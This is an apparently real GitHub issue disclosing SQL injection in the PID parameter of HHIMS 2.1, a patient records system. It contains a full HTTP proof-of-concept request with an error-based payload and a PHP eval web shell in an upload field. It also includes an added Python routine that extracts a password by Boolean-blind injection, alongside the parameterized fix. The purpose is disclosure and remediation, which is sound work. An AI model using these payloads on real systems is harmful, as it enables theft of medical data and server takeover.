SQL injection vulnerability exists in HHIMS V2.1 of patient medical record system #1

Closed
huclilu opened this issue Nov 10, 2022 · 2 comments

huclilu commented Nov 10, 2022

1. SQL injection vulnerability exists in HHIMS V2.1 of the patient medical record system

System version: 2.1

Vulnerability URL: http://hhims.test/index.php/attach/portrait/1

Build environment: Apache 2.4.39; MySQL 5.0.96; PHP 5.6.9

Vulnerability description:

HHIMS is a free and open-source software system used to store and retrieve a simple patient medical record. The system was programmed by Lunar Technologies for the ICTA (Information and Communication Technology Agency of the Sri Lankan Government).

Each patient has a corresponding PID parameter. In the patient portrait upload function, PID is a user-controllable variable, and the PID parameter is passed into the database query, which causes a SQL injection vulnerability.

The affected paths are application/modules/attach/controllers/attach.php and application/models/persistent.php

Code audit:

  • In the attach controller, lines 51-99, the save_portrait function is used to upload and save pictures. The parameters sent by the front end via POST include x, y, w, h and the variable PID

  • At code line 58, a function in the persistent model file listed above is called; there the variables are passed into the database query without any filtering

The SQL injection points are shown in the figure below

2. We can use sqlmap to validate:

  • Boolean-based blind injection

  • Error-based injection

3. Manual SQL injection proof

  • Manual verification

  • Burp Suite verification

4. SQL injection POC

POST /index.php/attach/save_portrait HTTP/1.1
Host: hhims.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 1098
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Cookie: PHPSESSID=ha23p18u46aqdcofn4hr2ae783; ci_session=a%3A18%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%226d0686706e577604e98e7b88dbf0ce0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A111%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F107.0.0.0+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1668046818%3Bs%3A3%3A%22UID%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22HID%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22last_prescription_cmd%22%3Bs%3A7%3A%22by_name%22%3Bs%3A5%3A%22Title%22%3Bs%3A3%3A%22Mr.%22%3Bs%3A9%3A%22FirstName%22%3Bs%3A16%3A%22Thurairajasingam%22%3Bs%3A4%3A%22Post%22%3Bs%3A14%3A%22Lab+Technician%22%3Bs%3A8%3A%22UserName%22%3Bs%3A4%3A%22demo%22%3Bs%3A8%3A%22FullName%22%3Bs%3A33%3A%22Mr.+Thurairajasingam+SENTHILRUBAN%22%3Bs%3A9%3A%22UserGroup%22%3Bs%3A10%3A%22Programmer%22%3Bs%3A8%3A%22Hospital%22%3Bs%3A15%3A%22Kalutara+Server%22%3Bs%3A15%3A%22DefaultLanguage%22%3Bs%3A7%3A%22English%22%3Bs%3A13%3A%22hospital_info%22%3Ba%3A31%3A%7Bs%3A3%3A%22HID%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22Name%22%3Bs%3A15%3A%22Kalutara+Server%22%3Bs%3A10%3A%22Telephone1%22%3Bs%3A7%3A%221234566%22%3Bs%3A10%3A%22Telephone2%22%3Bs%3A0%3A%22%22%3Bs%3A14%3A%22Address_Street%22%3Bs%3A14%3A%22No+2+Lake+Road%22%3Bs%3A15%3A%22Address_Village%22%3Bs%3A13%3A%22Gamagoda+West%22%3Bs%3A18%3A%22Address_DSDivision%22%3Bs%3A9%3A%22Dodangoda%22%3Bs%3A16%3A%22Address_District%22%3Bs%3A8%3A%22Kalutara%22%3Bs%3A15%3A%22Address_Country%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22Address_ZIP%22%3Bs%3A1%3A%220%22%3Bs%3A10%3A%22CreateDate%22%3Bs%3A19%3A%220000-00-00+00%3A00%3A00%22%3Bs%3A10%3A%22CreateUser%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22LastUpDate%22%3Bs%3A19%3A%222015-08-13+20%3A32%3A57%22%3Bs%3A14%3A%22LastUpDateUser%22%3Bs%3A33%3A%22Mr.+Thurairajasingam+SENTHILRUBAN%22%3Bs%3A6%3A%22Active%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22Code%22%3Bs%3A4%3A%220001%22%3Bs%3A4%3A%22Type%22%3Bs%3A3%3A%22PBH%22%3Bs%3A11%3A%22Current_BHT%22%3Bs%3A8%3A%222015%2F2%2F2%22%3Bs%3A18%3A%22Display_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A23%3A%22Display_Zero_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A19%3A%22Dispense_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22Display_Previous_Drug%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22Use_One_Field_Name%22%3Bs%3A1%3A%220%22%3Bs%3A16%3A%22Use_Calendar_DOB%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22Instant_Validation%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22Number_NIC_Validation%22%3Bs%3A1%3A%220%22%3Bs%3A8%3A%22LIC_Info%22%3Bs%3A149%3A%22HOSPITAL+NAME%3DKalutara+ServernHOSPITAL+Key%3Dca9792275c984972591f9d949cd7a4c85e04facfnBARCODE%3DYesnAPPOINTMENTSYSTEM%3DYesnAUTOANALIZER%3DYesnATTACHFILE%3DYes%22%3Bs%3A15%3A%22Visit_ICD_Field%22%3Bs%3A1%3A%220%22%3Bs%3A16%3A%22occupation_field%22%3Bs%3A1%3A%220%22%3Bs%3A18%3A%22Visit_SNOMED_Field%22%3Bs%3A1%3A%220%22%3Bs%3A17%3A%22Token_Footer_Text%22%3Bs%3A44%3A%22Appointment+system+programmed+by+Lunar+Tech.%22%3B%7Ds%3A10%3A%22reset_suer%22%3Bs%3A1%3A%223%22%3Bs%3A3%3A%22mid%22%3Bs%3A1%3A%224%22%3B%7D105940c11bc7b0aeafafcc429005fe67
Origin: http://hhims.test
Referer: http://hhims.test/index.php/attach/portrait/1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="w"
Content-Type: form-data


--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="h"
Content-Type: form-data


--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="PID"
Content-Type: form-data

1" AND ROW(1,2)>(SELECT COUNT(*),CONCAT((SELECT USER()),FLOOR(RAND(0)*2))x FROM (SELECT 6927 UNION SELECT 9908 UNION SELECT 1 UNION SELECT 2)a GROUP BY x) AND "ace"="ace
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="image"; filename="ace.jpg"
Content-Type: form-data

<?php eval(@$_POST['ace']);?>
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="x"
Content-Type: form-data


--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="y"
Content-Type: form-data


--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75--
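The PID payload above works because the value is spliced into a quoted SQL literal: `1"` closes the literal, the attacker's condition follows, and `AND "ace"="ace` re-balances the quotes so the statement still parses. The specific payload in the POC uses MySQL's duplicate-key trick (`COUNT(*)` with `GROUP BY` over `FLOOR(RAND(0)*2)`) to leak `USER()` through the error message, which only reproduces on MySQL. The example below is added here and is not HHIMS or Lunar Technologies code: it is a sqlite3 stand-in for the PID lookup that shows the same quote-breaking mechanism, drives the Boolean-based blind variant sqlmap also reported to extract a value one character at a time, and puts the parameterized fix beside it. Table names, column names, the `demo` user's password and the exact shape of the vulnerable query are all constructed assumptions, not the project's schema; sqlite3 is strict about double quotes, so the stand-in quotes the literal with single quotes (MySQL accepts both).

```python
# Added example, not code from the HHIMS project. A sqlite3 stand-in for the PID
# lookup: vulnerable string interpolation, a Boolean blind oracle built on it,
# and the bound-parameter form that closes the hole.
import sqlite3


def make_db():
    """Constructed sample data; table/column names are assumptions, not HHIMS schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patient (PID INTEGER PRIMARY KEY, Name TEXT)")
    conn.executemany("INSERT INTO patient VALUES (?, ?)",
                     [(1, "Patient One"), (2, "Patient Two")])
    conn.execute("CREATE TABLE user (UID INTEGER PRIMARY KEY, UserName TEXT, Password TEXT)")
    conn.execute("INSERT INTO user VALUES (1, 'demo', 's3cret')")
    conn.commit()
    return conn


def find_patient_vulnerable(conn, pid):
    """Assumed shape of the bug: PID interpolated into a quoted literal.
    Returns True when a row matches, which is all a blind attacker needs."""
    sql = "SELECT PID FROM patient WHERE PID = '%s'" % pid
    return conn.execute(sql).fetchone() is not None


def find_patient_safe(conn, pid):
    """Hardened form: the value is bound as a parameter, never parsed as SQL,
    and PID is additionally validated as an integer since that is its type."""
    try:
        pid = int(pid)
    except (TypeError, ValueError):
        return False
    row = conn.execute("SELECT PID FROM patient WHERE PID = ?", (pid,)).fetchone()
    return row is not None


def make_oracle(conn):
    """Boolean oracle over the vulnerable lookup: close the literal, inject the
    condition, re-balance the quotes the same way the POC's "ace"="ace does."""
    def oracle(condition):
        payload = "1' AND (%s) AND 'ace'='ace" % condition
        return find_patient_vulnerable(conn, payload)
    return oracle


def blind_extract(oracle, expr, max_len=64):
    """Recover the string value of SQL expression `expr` through the oracle by
    binary-searching each character's code point (printable ASCII 32..126).
    About 7 requests per character instead of up to 95."""
    out = ""
    for pos in range(1, max_len + 1):
        cp = "unicode(substr((%s), %d, 1))" % (expr, pos)
        # Past the end, substr() is '' and unicode('') is NULL, so '> 0' is false.
        if not oracle("%s > 0" % cp):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("%s > %d" % (cp, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    """Run the vulnerable and hardened lookups side by side and leak a value."""
    conn = make_db()
    oracle = make_oracle(conn)
    true_payload = "1' AND 1=1 AND 'ace'='ace"
    false_payload = "1' AND 1=2 AND 'ace'='ace"
    return {
        "vuln_true": find_patient_vulnerable(conn, true_payload),    # True
        "vuln_false": find_patient_vulnerable(conn, false_payload),  # False
        "safe_payload": find_patient_safe(conn, true_payload),       # False: not an int
        "safe_valid": find_patient_safe(conn, "1"),                  # True
        "leaked": blind_extract(
            oracle, "SELECT Password FROM user WHERE UserName = 'demo'"),
    }


if __name__ == "__main__":
    print(demo())
```

The two-state difference between `vuln_true` and `vuln_false` is the whole Boolean blind signal; `blind_extract` turns it into a data channel. In a CodeIgniter application the equivalent of `find_patient_safe` is to pass the value through query bindings (`$this->db->query('... WHERE PID = ?', array($pid))`) or the Active Record methods, and to cast or validate PID as an integer before it reaches the model.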
tsruban (Owner) commented Nov 10, 2022

Thanks. We have fixed this issue.

huclilu (Author) commented Nov 10, 2022

You're welcome

huclilu closed this as completed Nov 10, 2022